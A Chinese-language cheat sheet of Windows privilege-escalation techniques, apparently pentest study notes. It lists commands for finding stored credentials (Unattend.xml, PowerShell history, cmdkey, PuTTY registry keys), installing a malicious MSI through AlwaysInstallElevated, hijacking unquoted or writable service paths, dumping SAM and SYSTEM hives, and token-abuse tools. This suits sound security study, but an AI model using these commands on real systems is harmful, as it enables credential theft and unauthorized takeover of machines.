resmon.exe - 资源监视器
msinfo32.exe - 打开系统信息
compmgmt.msc - 计算机管理
UserAccountControlSettings.exe - 用户账户控制设置
control.exe - 控制面板
regedt32.exe - 注册表编辑器
takeown.exe - 获取文件或目录的所有权
accesschk.exe - 检查DACL
windows 查找可能存在的密码
配置文件
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
powershell 历史命令
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
$env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
凭据管理器
cmdkey /list
IIS 配置文件(IIS Configuration)
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
runas 利用已保存的密码
runas /savecred /user:admin cmd.exe
Putty 保存密码到注册表
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
提权-初级
计划任务(Scheduled Task)
schtasks.exe /query /tn vulntask /fo list /v => 关注 Task To Run: (运行的程序位置)
icacls.exe file_path => 查看文件的权限
schtasks.exe /run /tn vulntask => 重启服务
-----------------------------
AlwaysInstallElevated 策略: 允许 MSI(Microsoft Installer)安装包在提升的权限下安装,即使用户没有管理员权限。
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
利用: msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
滥用服务错误配置
- 服务可执行文件可被修改
sc qc ServerName
=> 关注BINARY_PATH_NAME
和SERVICE_START_NAME
=> 如果文件可以被修改,覆盖,然后重启服务=>sc stop ServerName
,sc start ServerName
- 未加引号的服务路径
比较两个服务的BINARY_PATH_NAME
a.BINARY_PATH_NAME : "C:\Program Files\RealVNC\VNC Server\vncserver.exe" -service
b.BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
a的路径是被双引号包裹,b没有,解析顺序依次如下
命令 | 参数1 | 参数2 |
---|---|---|
C:\MyPrograms\Disk.exe | Sorter | Enterprise\bin\disksrs.exe |
C:\MyPrograms\Disk Sorter.exe | Enterprise\bin\disksrs.exe | |
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe |
这与命令提示符分析命令的方式有关。通常,当您发送命令时,空格用作参数分隔符,除非它们是带引号的字符串的一部分。
因此可以在C:\MyPrograms\
目录下创建可执行文件Disk.exe
=> 重启服务
(需要授予其全部权限icacls C:\MyPrograms\Disk.exe /grant Everyone:F
)
- 不安全的服务权限
Sysinternals suite 工具Accesschk,用于检查服务的DACL(Discretionary Access Control List,即任意访问控制列表)accesschk64.exe -qlc ServiceName
Windows 权限列表: https://github.com/gtworek/Priv2Admin
SeBackup / SeRestore : 备份 hklm\system 和hklm\sam ( reg save hklm\system file.hive)
SeTakeOwnership : takeown.exe /f =>icacls
=>替换文件
SeImpersonate / SeAssignPrimaryToken: => RogueWinRM提权
已安装的软件信息 wmic product get name,version,vendor
自动化工具:
winpeas: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
PrivescCheck : https://github.com/itm4n/PrivescCheck
wesng: https://github.com/bitsadmin/wesng
msf: multi/recon/local_exploit_suggester
其他资源: